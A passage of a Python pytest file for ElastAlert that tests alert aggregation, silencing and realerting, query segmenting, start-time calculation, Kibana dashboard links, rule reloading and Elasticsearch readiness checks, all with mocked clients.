ea.rules[0]['type'].matches = [{'@timestamp': h} for h in hits_timestamps]
ea.run_rule(ea.rules[0], END, START)
# Assert that the three matches were added to Elasticsearch
call1 = ea.writeback_es.index.call_args_list[0][1]['body']
call2 = ea.writeback_es.index.call_args_list[1][1]['body']
call3 = ea.writeback_es.index.call_args_list[2][1]['body']
assert call1['match_body']['@timestamp'] == '2014-09-26T12:34:45'
assert not call1['alert_sent']
assert 'aggregate_id' not in call1
assert call1['alert_time'] == alerttime1
assert call2['match_body']['@timestamp'] == '2014-09-26T12:40:45'
assert not call2['alert_sent']
assert call2['aggregate_id'] == 'ABCD'
assert call3['match_body']['@timestamp'] == '2014-09-26T12:47:45'
assert call3['alert_time'] == alerttime2
assert not call3['alert_sent']
assert 'aggregate_id' not in call3
def test_agg_no_writeback_connectivity(ea):
""" Tests that if writeback_es throws an exception, the matches will be added to 'agg_matches' and when
run again, that they will be passed again to add_aggregated_alert """
hit1, hit2, hit3 = '2014-09-26T12:34:45', '2014-09-26T12:40:45', '2014-09-26T12:47:45'
hits = generate_hits([hit1, hit2, hit3])
ea.thread_data.current_es.search.return_value = hits
ea.rules[0]['aggregation'] = datetime.timedelta(minutes=10)
ea.rules[0]['type'].matches = [{'@timestamp': hit1},
{'@timestamp': hit2},
{'@timestamp': hit3}]
ea.writeback_es.index.side_effect = elasticsearch.exceptions.ElasticsearchException('Nope')
with mock.patch('elastalert.elastalert.elasticsearch_client'):
with mock.patch.object(ea, 'find_pending_aggregate_alert', return_value=None):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['agg_matches'] == [{'@timestamp': hit1, 'num_hits': 0, 'num_matches': 3},
{'@timestamp': hit2, 'num_hits': 0, 'num_matches': 3},
{'@timestamp': hit3, 'num_hits': 0, 'num_matches': 3}]
ea.thread_data.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea.add_aggregated_alert = mock.Mock()
with mock.patch.object(ea, 'run_query'):
ea.run_rule(ea.rules[0], END, START)
ea.add_aggregated_alert.assert_any_call({'@timestamp': hit1, 'num_hits': 0, 'num_matches': 3}, ea.rules[0])
ea.add_aggregated_alert.assert_any_call({'@timestamp': hit2, 'num_hits': 0, 'num_matches': 3}, ea.rules[0])
ea.add_aggregated_alert.assert_any_call({'@timestamp': hit3, 'num_hits': 0, 'num_matches': 3}, ea.rules[0])
def test_agg_with_aggregation_key(ea):
ea.max_aggregation = 1337
hits_timestamps = ['2014-09-26T12:34:45', '2014-09-26T12:40:45', '2014-09-26T12:43:45']
match_time = ts_to_dt('2014-09-26T12:45:00Z')
hits = generate_hits(hits_timestamps)
ea.thread_data.current_es.search.return_value = hits
with mock.patch('elastalert.elastalert.elasticsearch_client') as mock_es:
mock_es.return_value = ea.thread_data.current_es
with mock.patch('elastalert.elastalert.ts_now', return_value=match_time):
ea.rules[0]['aggregation'] = datetime.timedelta(minutes=10)
ea.rules[0]['type'].matches = [{'@timestamp': h} for h in hits_timestamps]
# Hit1 and Hit3 should be aggregated together, since they have the same aggregation_key value
ea.rules[0]['type'].matches[0]['key'] = 'Key Value 1'
ea.rules[0]['type'].matches[1]['key'] = 'Key Value 2'
ea.rules[0]['type'].matches[2]['key'] = 'Key Value 1'
ea.rules[0]['aggregation_key'] = 'key'
ea.run_rule(ea.rules[0], END, START)
# Assert that the three matches were added to elasticsearch
call1 = ea.writeback_es.index.call_args_list[0][1]['body']
call2 = ea.writeback_es.index.call_args_list[1][1]['body']
call3 = ea.writeback_es.index.call_args_list[2][1]['body']
assert call1['match_body']['key'] == 'Key Value 1'
assert not call1['alert_sent']
assert 'aggregate_id' not in call1
assert 'aggregation_key' in call1
assert call1['aggregation_key'] == 'Key Value 1'
assert call1['alert_time'] == dt_to_ts(match_time + datetime.timedelta(minutes=10))
assert call2['match_body']['key'] == 'Key Value 2'
assert not call2['alert_sent']
assert 'aggregate_id' not in call2
assert 'aggregation_key' in call2
assert call2['aggregation_key'] == 'Key Value 2'
assert call2['alert_time'] == dt_to_ts(match_time + datetime.timedelta(minutes=10))
assert call3['match_body']['key'] == 'Key Value 1'
assert not call3['alert_sent']
# Call3 should have its aggregate_id set to call1's _id
# It should also have the same alert_time as call1
assert call3['aggregate_id'] == 'ABCD'
assert 'aggregation_key' in call3
assert call3['aggregation_key'] == 'Key Value 1'
assert call3['alert_time'] == dt_to_ts(match_time + datetime.timedelta(minutes=10))
# First call - Find all pending alerts (only entries without agg_id)
# Second call - Find matches with agg_id == 'ABCD'
# Third call - Find matches with agg_id == 'CDEF'
ea.writeback_es.deprecated_search.side_effect = [{'hits': {'hits': [{'_id': 'ABCD', '_index': 'wb', '_source': call1},
{'_id': 'CDEF', '_index': 'wb', '_source': call2}]}},
{'hits': {'hits': [{'_id': 'BCDE', '_index': 'wb', '_source': call3}]}},
{'hits': {'total': 0, 'hits': []}}]
with mock.patch('elastalert.elastalert.elasticsearch_client') as mock_es:
mock_es.return_value = ea.thread_data.current_es
ea.send_pending_alerts()
# Assert that current_es was refreshed from the aggregate rules
assert mock_es.called_with(host='', port='')
assert mock_es.call_count == 2
assert_alerts(ea, [[hits_timestamps[0], hits_timestamps[2]], [hits_timestamps[1]]])
call1 = ea.writeback_es.deprecated_search.call_args_list[7][1]['body']
call2 = ea.writeback_es.deprecated_search.call_args_list[8][1]['body']
call3 = ea.writeback_es.deprecated_search.call_args_list[9][1]['body']
call4 = ea.writeback_es.deprecated_search.call_args_list[10][1]['body']
assert 'alert_time' in call2['filter']['range']
assert call3['query']['query_string']['query'] == 'aggregate_id:ABCD'
assert call4['query']['query_string']['query'] == 'aggregate_id:CDEF'
assert ea.writeback_es.deprecated_search.call_args_list[9][1]['size'] == 1337
def test_silence(ea):
# Silence test rule for 4 hours
ea.args.rule = 'test_rule.yaml' # Not a real name, just has to be set
ea.args.silence = 'hours=4'
ea.silence()
# Don't alert even with a match
match = [{'@timestamp': '2014-11-17T00:00:00'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 0
# Mock ts_now() to +5 hours, alert on match
match = [{'@timestamp': '2014-11-17T00:00:00'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.ts_now') as mock_ts:
with mock.patch('elastalert.elastalert.elasticsearch_client'):
# Converted twice to add tzinfo
mock_ts.return_value = ts_to_dt(dt_to_ts(datetime.datetime.utcnow() + datetime.timedelta(hours=5)))
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 1
def test_compound_query_key(ea):
ea.rules[0]['query_key'] = 'this,that,those'
ea.rules[0]['compound_query_key'] = ['this', 'that', 'those']
hits = generate_hits([START_TIMESTAMP, END_TIMESTAMP], this='abc', that='☃', those=4)
ea.thread_data.current_es.search.return_value = hits
ea.run_query(ea.rules[0], START, END)
call_args = ea.rules[0]['type'].add_data.call_args_list[0]
assert 'this,that,those' in call_args[0][0][0]
assert call_args[0][0][0]['this,that,those'] == 'abc, ☃, 4'
def test_silence_query_key(ea):
# Silence test rule for 4 hours
ea.args.rule = 'test_rule.yaml' # Not a real name, just has to be set
ea.args.silence = 'hours=4'
ea.silence('anytest.qlo')
# Don't alert even with a match
match = [{'@timestamp': '2014-11-17T00:00:00', 'username': 'qlo'}]
ea.rules[0]['type'].matches = match
ea.rules[0]['query_key'] = 'username'
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 0
# If there is a new record with a different value for the query_key, we should get an alert
match = [{'@timestamp': '2014-11-17T00:00:01', 'username': 'dpopes'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 1
# Mock ts_now() to +5 hours, alert on match
match = [{'@timestamp': '2014-11-17T00:00:00', 'username': 'qlo'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.ts_now') as mock_ts:
with mock.patch('elastalert.elastalert.elasticsearch_client'):
# Converted twice to add tzinfo
mock_ts.return_value = ts_to_dt(dt_to_ts(datetime.datetime.utcnow() + datetime.timedelta(hours=5)))
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 2
def test_realert(ea):
hits = ['2014-09-26T12:35:%sZ' % (x) for x in range(60)]
matches = [{'@timestamp': x} for x in hits]
ea.thread_data.current_es.search.return_value = hits
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.rules[0]['realert'] = datetime.timedelta(seconds=50)
ea.rules[0]['type'].matches = matches
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 1
# Doesn't alert again
matches = [{'@timestamp': x} for x in hits]
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
ea.rules[0]['type'].matches = matches
assert ea.rules[0]['alert'][0].alert.call_count == 1
# mock ts_now() to past the realert time
matches = [{'@timestamp': hits[0]}]
with mock.patch('elastalert.elastalert.ts_now') as mock_ts:
with mock.patch('elastalert.elastalert.elasticsearch_client'):
# mock_ts is converted twice to add tzinfo
mock_ts.return_value = ts_to_dt(dt_to_ts(datetime.datetime.utcnow() + datetime.timedelta(minutes=10)))
ea.rules[0]['type'].matches = matches
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 2
def test_realert_with_query_key(ea):
ea.rules[0]['query_key'] = 'username'
ea.rules[0]['realert'] = datetime.timedelta(minutes=10)
# Alert and silence username: qlo
match = [{'@timestamp': '2014-11-17T00:00:00', 'username': 'qlo'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 1
# Don't alert again for the same username
match = [{'@timestamp': '2014-11-17T00:05:00', 'username': 'qlo'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 1
# Do alert with a different value
match = [{'@timestamp': '2014-11-17T00:05:00', 'username': ''}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 2
# Alert with query_key missing
match = [{'@timestamp': '2014-11-17T00:05:00'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 3
# Still alert with a different value
match = [{'@timestamp': '2014-11-17T00:05:00', 'username': 'ghengis_khan'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 4
def test_realert_with_nested_query_key(ea):
ea.rules[0]['query_key'] = 'user.name'
ea.rules[0]['realert'] = datetime.timedelta(minutes=10)
# Alert and silence username: qlo
match = [{'@timestamp': '2014-11-17T00:00:00', 'user': {'name': 'qlo'}}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 1
# Don't alert again for the same username
match = [{'@timestamp': '2014-11-17T00:05:00', 'user': {'name': 'qlo'}}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 1
def test_count(ea):
ea.rules[0]['use_count_query'] = True
ea.rules[0]['doc_type'] = 'doctype'
with mock.patch('elastalert.elastalert.elasticsearch_client'), \
mock.patch.object(ea, 'get_hits_count') as mock_hits:
ea.run_rule(ea.rules[0], END, START)
# Assert that es.count is run against every run_every timeframe between START and END
start = START
query = {
'query': {'filtered': {
'filter': {'bool': {'must': [{'range': {'@timestamp': {'lte': END_TIMESTAMP, 'gt': START_TIMESTAMP}}}]}}}}}
while END - start > ea.run_every:
end = start + ea.run_every
query['query']['filtered']['filter']['bool']['must'][0]['range']['@timestamp']['lte'] = dt_to_ts(end)
query['query']['filtered']['filter']['bool']['must'][0]['range']['@timestamp']['gt'] = dt_to_ts(start)
mock_hits.assert_any_call(mock.ANY, start, end, mock.ANY)
start = start + ea.run_every
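# Helper: run the rule over [start, end] and assert that run_query was called once per segment_size
# chunk and that the final elastalert_status entry written covers the whole time range.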
def run_and_assert_segmented_queries(ea, start, end, segment_size):
with mock.patch.object(ea, 'run_query') as mock_run_query:
ea.run_rule(ea.rules[0], end, start)
original_end, original_start = end, start
for call_args in mock_run_query.call_args_list:
end = min(start + segment_size, original_end)
assert call_args[0][1:3] == (start, end)
start += segment_size
# Assert elastalert_status was created for the entire time range
assert ea.writeback_es.index.call_args_list[-1][1]['body']['starttime'] == dt_to_ts(original_start)
if ea.rules[0].get('aggregation_query_element'):
assert ea.writeback_es.index.call_args_list[-1][1]['body']['endtime'] == dt_to_ts(
original_end - (original_end - end))
assert original_end - end < segment_size
else:
assert ea.writeback_es.index.call_args_list[-1][1]['body']['endtime'] == dt_to_ts(original_end)
def test_query_segmenting_reset_num_hits(ea):
# Tests that num_hits gets reset every time run_query is run
def assert_num_hits_reset():
assert ea.thread_data.num_hits == 0
ea.thread_data.num_hits += 10
with mock.patch.object(ea, 'run_query') as mock_run_query:
mock_run_query.side_effect = assert_num_hits_reset
ea.run_rule(ea.rules[0], END, START)
assert mock_run_query.call_count > 1
def test_query_segmenting(ea):
# buffer_time segments with normal queries
ea.rules[0]['buffer_time'] = datetime.timedelta(minutes=53)
with mock.patch('elastalert.elastalert.elasticsearch_client'):
run_and_assert_segmented_queries(ea, START, END, ea.rules[0]['buffer_time'])
# run_every segments with count queries
ea.rules[0]['use_count_query'] = True
with mock.patch('elastalert.elastalert.elasticsearch_client'):
run_and_assert_segmented_queries(ea, START, END, ea.run_every)
# run_every segments with terms queries
ea.rules[0].pop('use_count_query')
ea.rules[0]['use_terms_query'] = True
with mock.patch('elastalert.elastalert.elasticsearch_client'):
run_and_assert_segmented_queries(ea, START, END, ea.run_every)
# buffer_time segments with aggregation queries
ea.rules[0].pop('use_terms_query')
ea.rules[0]['aggregation_query_element'] = {'term': 'term_val'}
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.rules[0]['buffer_time'] = datetime.timedelta(minutes=30)
run_and_assert_segmented_queries(ea, START, END, ea.rules[0]['buffer_time'])
# partial segment size scenario
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.rules[0]['buffer_time'] = datetime.timedelta(minutes=53)
run_and_assert_segmented_queries(ea, START, END, ea.rules[0]['buffer_time'])
# run every segmenting
ea.rules[0]['use_run_every_query_size'] = True
with mock.patch('elastalert.elastalert.elasticsearch_client'):
run_and_assert_segmented_queries(ea, START, END, ea.run_every)
def test_get_starttime(ea):
endtime = '2015-01-01T00:00:00Z'
mock_es = mock.Mock()
mock_es.search.return_value = {'hits': {'hits': [{'_source': {'endtime': endtime}}]}}
mock_es.info.return_value = {'version': {'number': '2.0'}}
ea.writeback_es = mock_es
# 4 days old, will return endtime
with mock.patch('elastalert.elastalert.ts_now') as mock_ts:
mock_ts.return_value = ts_to_dt('2015-01-05T00:00:00Z') # 4 days ahead of the endtime
assert ea.get_starttime(ea.rules[0]) == ts_to_dt(endtime)
# 10 days old, will return None
with mock.patch('elastalert.elastalert.ts_now') as mock_ts:
mock_ts.return_value = ts_to_dt('2015-01-11T00:00:00Z') # 10 days ahead of the endtime
assert ea.get_starttime(ea.rules[0]) is None
def test_set_starttime(ea):
# standard query, no starttime, no last run
end = ts_to_dt('2014-10-10T10:10:10')
with mock.patch.object(ea, 'get_starttime') as mock_gs:
mock_gs.return_value = None
ea.set_starttime(ea.rules[0], end)
assert mock_gs.call_count == 1
assert ea.rules[0]['starttime'] == end - ea.buffer_time
# Standard query, no starttime, rule specific buffer_time
ea.rules[0].pop('starttime')
ea.rules[0]['buffer_time'] = datetime.timedelta(minutes=37)
with mock.patch.object(ea, 'get_starttime') as mock_gs:
mock_gs.return_value = None
ea.set_starttime(ea.rules[0], end)
assert mock_gs.call_count == 1
assert ea.rules[0]['starttime'] == end - datetime.timedelta(minutes=37)
ea.rules[0].pop('buffer_time')
# Standard query, no starttime, last run
ea.rules[0].pop('starttime')
with mock.patch.object(ea, 'get_starttime') as mock_gs:
mock_gs.return_value = ts_to_dt('2014-10-10T00:00:00')
ea.set_starttime(ea.rules[0], end)
assert mock_gs.call_count == 1
assert ea.rules[0]['starttime'] == ts_to_dt('2014-10-10T00:00:00')
# Standard query, no starttime, last run; assure buffer_time doesn't go past minimum_starttime
ea.rules[0].pop('starttime')
ea.rules[0]['buffer_time'] = datetime.timedelta(weeks=1000)
with mock.patch.object(ea, 'get_starttime') as mock_gs:
mock_gs.return_value = ts_to_dt('2014-10-09T00:00:00')
# First call sets minimum_starttime
ea.set_starttime(ea.rules[0], end)
# Second call uses buffer_time, but it goes past minimum
ea.set_starttime(ea.rules[0], end)
assert ea.rules[0]['starttime'] == ts_to_dt('2014-10-09T00:00:00')
# Standard query, starttime
ea.rules[0].pop('buffer_time')
ea.rules[0].pop('minimum_starttime')
with mock.patch.object(ea, 'get_starttime') as mock_gs:
mock_gs.return_value = None
ea.set_starttime(ea.rules[0], end)
assert mock_gs.call_count == 0
assert ea.rules[0]['starttime'] == end - ea.buffer_time
# Count query, starttime, no previous endtime
ea.rules[0]['use_count_query'] = True
ea.rules[0]['doc_type'] = 'blah'
with mock.patch.object(ea, 'get_starttime') as mock_gs:
mock_gs.return_value = None
ea.set_starttime(ea.rules[0], end)
assert mock_gs.call_count == 0
assert ea.rules[0]['starttime'] == end - ea.run_every
# Count query, with previous endtime
with mock.patch('elastalert.elastalert.elasticsearch_client'), \
mock.patch.object(ea, 'get_hits_count'):
ea.run_rule(ea.rules[0], END, START)
ea.set_starttime(ea.rules[0], end)
assert ea.rules[0]['starttime'] == END
# buffer_time doesn't go past previous endtime
ea.rules[0].pop('use_count_query')
ea.rules[0]['previous_endtime'] = end - ea.buffer_time * 2
ea.set_starttime(ea.rules[0], end)
assert ea.rules[0]['starttime'] == ea.rules[0]['previous_endtime']
# Make sure starttime is updated if previous_endtime isn't used
ea.rules[0]['previous_endtime'] = end - ea.buffer_time / 2
ea.rules[0]['starttime'] = ts_to_dt('2014-10-09T00:00:01')
ea.set_starttime(ea.rules[0], end)
assert ea.rules[0]['starttime'] == end - ea.buffer_time
# scan_entire_timeframe
ea.rules[0].pop('previous_endtime')
ea.rules[0].pop('starttime')
ea.rules[0]['timeframe'] = datetime.timedelta(days=3)
ea.rules[0]['scan_entire_timeframe'] = True
with mock.patch.object(ea, 'get_starttime') as mock_gs:
mock_gs.return_value = None
ea.set_starttime(ea.rules[0], end)
assert ea.rules[0]['starttime'] == end - datetime.timedelta(days=3)
def test_kibana_dashboard(ea):
match = {'@timestamp': '2014-10-11T00:00:00'}
mock_es = mock.Mock()
ea.rules[0]['use_kibana_dashboard'] = 'my dashboard'
with mock.patch('elastalert.elastalert.elasticsearch_client') as mock_es_init:
mock_es_init.return_value = mock_es
# No dashboard found
mock_es.deprecated_search.return_value = {'hits': {'total': 0, 'hits': []}}
with pytest.raises(EAException):
ea.use_kibana_link(ea.rules[0], match)
mock_call = mock_es.deprecated_search.call_args_list[0][1]
assert mock_call['body'] == {'query': {'term': {'_id': 'my dashboard'}}}
# Dashboard found
mock_es.index.return_value = {'_id': 'ABCDEFG'}
mock_es.deprecated_search.return_value = {'hits': {'hits': [{'_source': {'dashboard': json.dumps(dashboard_temp)}}]}}
url = ea.use_kibana_link(ea.rules[0], match)
assert 'ABCDEFG' in url
db = json.loads(mock_es.index.call_args_list[0][1]['body']['dashboard'])
assert 'anytest' in db['title']
# Query key filtering added
ea.rules[0]['query_key'] = 'foobar'
match['foobar'] = 'baz'
url = ea.use_kibana_link(ea.rules[0], match)
db = json.loads(mock_es.index.call_args_list[-1][1]['body']['dashboard'])
assert db['services']['filter']['list']['1']['field'] == 'foobar'
assert db['services']['filter']['list']['1']['query'] == '"baz"'
# Compound query key
ea.rules[0]['query_key'] = 'foo,bar'
ea.rules[0]['compound_query_key'] = ['foo', 'bar']
match['foo'] = 'cat'
match['bar'] = 'dog'
match['foo,bar'] = 'cat, dog'
url = ea.use_kibana_link(ea.rules[0], match)
db = json.loads(mock_es.index.call_args_list[-1][1]['body']['dashboard'])
found_filters = 0
for filter_id, filter_dict in list(db['services']['filter']['list'].items()):
if (filter_dict['field'] == 'foo' and filter_dict['query'] == '"cat"') or \
(filter_dict['field'] == 'bar' and filter_dict['query'] == '"dog"'):
found_filters += 1
continue
assert found_filters == 2
def test_rule_changes(ea):
ea.rule_hashes = {'rules/rule1.yaml': 'ABC',
'rules/rule2.yaml': 'DEF'}
run_every = datetime.timedelta(seconds=1)
ea.rules = [ea.init_rule(rule, True) for rule in [{'rule_file': 'rules/rule1.yaml', 'name': 'rule1', 'filter': [],
'run_every': run_every},
{'rule_file': 'rules/rule2.yaml', 'name': 'rule2', 'filter': [],
'run_every': run_every}]]
ea.rules[1]['processed_hits'] = ['save me']
new_hashes = {'rules/rule1.yaml': 'ABC',
'rules/rule3.yaml': 'XXX',
'rules/rule2.yaml': '!@#$'}
with mock.patch.object(ea.conf['rules_loader'], 'get_hashes') as mock_hashes:
with mock.patch.object(ea.conf['rules_loader'], 'load_configuration') as mock_load:
mock_load.side_effect = [{'filter': [], 'name': 'rule2', 'rule_file': 'rules/rule2.yaml', 'run_every': run_every},
{'filter': [], 'name': 'rule3', 'rule_file': 'rules/rule3.yaml', 'run_every': run_every}]
mock_hashes.return_value = new_hashes
ea.load_rule_changes()
# All 3 rules still exist
assert ea.rules[0]['name'] == 'rule1'
assert ea.rules[1]['name'] == 'rule2'
assert ea.rules[1]['processed_hits'] == ['save me']
assert ea.rules[2]['name'] == 'rule3'
# Assert 2 and 3 were reloaded
assert mock_load.call_count == 2
mock_load.assert_any_call('rules/rule2.yaml', ea.conf)
mock_load.assert_any_call('rules/rule3.yaml', ea.conf)
# A new rule with a conflicting name won't load
new_hashes = copy.copy(new_hashes)
new_hashes.update({'rules/rule4.yaml': 'asdf'})
with mock.patch.object(ea.conf['rules_loader'], 'get_hashes') as mock_hashes:
with mock.patch.object(ea.conf['rules_loader'], 'load_configuration') as mock_load:
with mock.patch.object(ea, 'send_notification_email') as mock_send:
mock_load.return_value = {'filter': [], 'name': 'rule3', 'new': 'stuff',
'rule_file': 'rules/rule4.yaml', 'run_every': run_every}
mock_hashes.return_value = new_hashes
ea.load_rule_changes()
mock_send.assert_called_once_with(exception=mock.ANY, rule_file='rules/rule4.yaml')
assert len(ea.rules) == 3
assert not any(['new' in rule for rule in ea.rules])
# A new rule with is_enabled=False won't load
new_hashes = copy.copy(new_hashes)
new_hashes.update({'rules/rule4.yaml': 'asdf'})
with mock.patch.object(ea.conf['rules_loader'], 'get_hashes') as mock_hashes:
with mock.patch.object(ea.conf['rules_loader'], 'load_configuration') as mock_load:
mock_load.return_value = {'filter': [], 'name': 'rule4', 'new': 'stuff', 'is_enabled': False,
'rule_file': 'rules/rule4.yaml', 'run_every': run_every}
mock_hashes.return_value = new_hashes
ea.load_rule_changes()
assert len(ea.rules) == 3
assert not any(['new' in rule for rule in ea.rules])
# An old rule which didn't load gets reloaded
new_hashes = copy.copy(new_hashes)
new_hashes['rules/rule4.yaml'] = 'qwerty'
with mock.patch.object(ea.conf['rules_loader'], 'get_hashes') as mock_hashes:
with mock.patch.object(ea.conf['rules_loader'], 'load_configuration') as mock_load:
mock_load.return_value = {'filter': [], 'name': 'rule4', 'new': 'stuff', 'rule_file': 'rules/rule4.yaml',
'run_every': run_every}
mock_hashes.return_value = new_hashes
ea.load_rule_changes()
assert len(ea.rules) == 4
# Disable a rule by removing the file
new_hashes.pop('rules/rule4.yaml')
with mock.patch.object(ea.conf['rules_loader'], 'get_hashes') as mock_hashes:
with mock.patch.object(ea.conf['rules_loader'], 'load_configuration') as mock_load:
mock_load.return_value = {'filter': [], 'name': 'rule4', 'new': 'stuff', 'rule_file': 'rules/rule4.yaml',
'run_every': run_every}
mock_hashes.return_value = new_hashes
ea.load_rule_changes()
ea.scheduler.remove_job.assert_called_with(job_id='rule4')
def test_strf_index(ea):
""" Test that the get_index function properly generates indexes spanning days """
ea.rules[0]['index'] = 'logstash-%Y.%m.%d'
ea.rules[0]['use_strftime_index'] = True
# Test formatting with times
start = ts_to_dt('2015-01-02T12:34:45Z')
end = ts_to_dt('2015-01-02T16:15:14Z')
assert ea.get_index(ea.rules[0], start, end) == 'logstash-2015.01.02'
end = ts_to_dt('2015-01-03T01:02:03Z')
assert set(ea.get_index(ea.rules[0], start, end).split(',')) == set(['logstash-2015.01.02', 'logstash-2015.01.03'])
# Test formatting for wildcard
assert ea.get_index(ea.rules[0]) == 'logstash-*'
ea.rules[0]['index'] = 'logstash-%Y.%m'
assert ea.get_index(ea.rules[0]) == 'logstash-*'
ea.rules[0]['index'] = 'logstash-%Y.%m-stuff'
assert ea.get_index(ea.rules[0]) == 'logstash-*-stuff'
def test_count_keys(ea):
ea.rules[0]['timeframe'] = datetime.timedelta(minutes=60)
ea.rules[0]['top_count_keys'] = ['this', 'that']
ea.rules[0]['type'].matches = {'@timestamp': END}
ea.rules[0]['doc_type'] = 'blah'
buckets = [{'aggregations': {
'filtered': {'counts': {'buckets': [{'key': 'a', 'doc_count': 10}, {'key': 'b', 'doc_count': 5}]}}}},
{'aggregations': {'filtered': {
'counts': {'buckets': [{'key': 'd', 'doc_count': 10}, {'key': 'c', 'doc_count': 12}]}}}}]
ea.thread_data.current_es.deprecated_search.side_effect = buckets
counts = ea.get_top_counts(ea.rules[0], START, END, ['this', 'that'])
calls = ea.thread_data.current_es.deprecated_search.call_args_list
assert calls[0][1]['search_type'] == 'count'
assert calls[0][1]['body']['aggs']['filtered']['aggs']['counts']['terms'] == {'field': 'this', 'size': 5,
'min_doc_count': 1}
assert counts['top_events_this'] == {'a': 10, 'b': 5}
assert counts['top_events_that'] == {'d': 10, 'c': 12}
def test_exponential_realert(ea):
ea.rules[0]['exponential_realert'] = datetime.timedelta(days=1) # 1 day ~ 10 * 2**13 seconds
ea.rules[0]['realert'] = datetime.timedelta(seconds=10)
until = ts_to_dt('2015-03-24T00:00:00')
ts5s = until + datetime.timedelta(seconds=5)
ts15s = until + datetime.timedelta(seconds=15)
ts1m = until + datetime.timedelta(minutes=1)
ts5m = until + datetime.timedelta(minutes=5)
ts4h = until + datetime.timedelta(hours=4)
test_values = [(ts5s, until, 0), # Exp will increase to 1, 10*2**0 = 10s
(ts15s, until, 0), # Exp will stay at 0, 10*2**0 = 10s
(ts15s, until, 1), # Exp will increase to 2, 10*2**1 = 20s
(ts1m, until, 2), # Exp will decrease to 1, 10*2**2 = 40s
(ts1m, until, 3), # Exp will increase to 4, 10*2**3 = 1m20s
(ts5m, until, 1), # Exp will lower back to 0, 10*2**1 = 20s
(ts4h, until, 9), # Exp will lower back to 0, 10*2**9 = 1h25m
(ts4h, until, 10), # Exp will lower back to 9, 10*2**10 = 2h50m
(ts4h, until, 11)] # Exp will increase to 12, 10*2**11 = 5h
results = (1, 0, 2, 1, 4, 0, 0, 9, 12)
next_res = iter(results)
for args in test_values:
ea.silence_cache[ea.rules[0]['name']] = (args[1], args[2])
next_alert, exponent = ea.next_alert_time(ea.rules[0], ea.rules[0]['name'], args[0])
assert exponent == next(next_res)
def test_wait_until_responsive(ea):
"""Unblock as soon as ElasticSearch becomes responsive."""
# Takes a while before becoming responsive.
ea.writeback_es.indices.exists.side_effect = [
ConnectionError(), # ES is not yet responsive.
False, # index does not yet exist.
True,
]
clock = mock.MagicMock()
clock.side_effect = [0.0, 1.0, 2.0, 3.0, 4.0]
timeout = datetime.timedelta(seconds=3.5)
with mock.patch('time.sleep') as sleep:
ea.wait_until_responsive(timeout=timeout, clock=clock)
# Sleep as little as we can.
sleep.mock_calls == [
mock.call(1.0),
]
def test_wait_until_responsive_timeout_es_not_available(ea, capsys):
"""Bail out if ElasticSearch doesn't (quickly) become responsive."""
# Never becomes responsive :-)
ea.writeback_es.ping.return_value = False
ea.writeback_es.indices.exists.return_value = False
clock = mock.MagicMock()
clock.side_effect = [0.0, 1.0, 2.0, 3.0]
timeout = datetime.timedelta(seconds=2.5)
with mock.patch('time.sleep') as sleep:
with pytest.raises(SystemExit) as exc:
ea.wait_until_responsive(timeout=timeout, clock=clock)
assert exc.value.code == 1
# Ensure we get useful diagnostics.
output, errors = capsys.readouterr()
assert 'Could not reach ElasticSearch at "es:14900".' in errors
# Slept until we passed the deadline.
sleep.mock_calls == [
mock.call(1.0),
mock.call(1.0),
mock.call(1.0),
]
def test_wait_until_responsive_timeout_index_does_not_exist(ea, capsys):
"""Bail out if ElasticSearch doesn't (quickly) become responsive."""
# Never becomes responsive :-)
ea.writeback_es.ping.return_value = True
ea.writeback_es.indices.exists.return_value = False
clock = mock.MagicMock()
clock.side_effect = [0.0, 1.0, 2.0, 3.0]
timeout = datetime.timedelta(seconds=2.5)
with mock.patch('time.sleep') as sleep:
with pytest.raises(SystemExit) as exc:
ea.wait_until_responsive(timeout=timeout, clock=clock)
assert exc.value.code == 1
# Ensure we get useful diagnostics.
output, errors = capsys.readouterr()
assert 'Writeback alias "wb_a" does not exist, did you run `elastalert-create-index`?' in errors
# Slept until we passed the deadline.
sleep.mock_calls == [
mock.call(1.0),
mock.call(1.0),
mock.call(1.0),
]
